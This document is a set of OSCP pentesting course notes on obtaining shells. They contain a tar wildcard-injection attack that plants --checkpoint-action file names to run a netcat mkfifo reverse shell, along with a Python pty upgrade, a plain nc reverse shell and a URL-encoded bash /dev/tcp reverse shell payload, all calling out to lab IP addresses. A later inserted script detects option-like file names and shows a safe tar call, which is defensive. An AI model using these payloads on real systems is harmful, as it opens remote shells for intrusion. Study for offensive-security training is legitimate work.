Shells


The following are notes from my pentesting course for OSCP.

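If there is an app using tar * you can do the following. The shell expands * to the file names in the directory, and tar parses any name that begins with -- as an option: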

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.218.104 4444 >/tmp/f" > shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"
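
The same behaviour can be checked for and avoided on the system that runs the tar job. The script below is an added example, not part of the original notes: it lists the names in a directory that tar would parse as options, counts how many option-like arguments `*` and `./*` produce, and archives with `-C dir .` so that no file name reaches tar's command line. The function names and the sample directory are assumptions made for illustration.

```shell
#!/bin/sh
# Added example, not from the original notes. Function names are hypothetical.

# List entries of directory $1 whose names begin with "-". A job that runs
# `tar ... *` in that directory passes each of these names to tar as an option.
find_option_like_names() {
    for f in "$1"/-*; do
        [ -e "$f" ] || continue          # glob matched nothing
        printf '%s\n' "${f##*/}"
    done
}

# Count the arguments starting with "-" that a command run in directory $1
# would receive from the glob: style "bare" is *, style "dot" is ./*
count_option_args() {
    (
        cd "$1" || exit 1
        if [ "$2" = dot ]; then set -- ./*; else set -- *; fi
        n=0
        for a in "$@"; do
            case $a in -*) n=$((n + 1)) ;; esac
        done
        echo "$n"
    )
}

# Hardened archive step: no wildcard at all. tar walks the directory itself,
# so file names are data and never appear on its command line.
safe_archive() {
    tar -cf "$2" -C "$1" .
}

# Demo on a constructed directory (empty files, names chosen for the demo).
demo() {
    d=$(mktemp -d) || return 1
    : > "$d/index.html"
    : > "$d/--checkpoint=1"
    echo "option-like names: $(find_option_like_names "$d")"
    echo "bare glob: $(count_option_args "$d" bare), ./ glob: $(count_option_args "$d" dot)"
    rm -rf "$d"
}
demo
```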

Clean Shell using Python on Linux

python -c 'import pty; pty.spawn("/bin/bash")'

python3 -c 'import pty; pty.spawn("/bin/bash")'

# Simple shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.35 443 >/tmp/f

# Bash Reverse Shell

bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.14/443+0>%261'%26host=

Further reading

https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/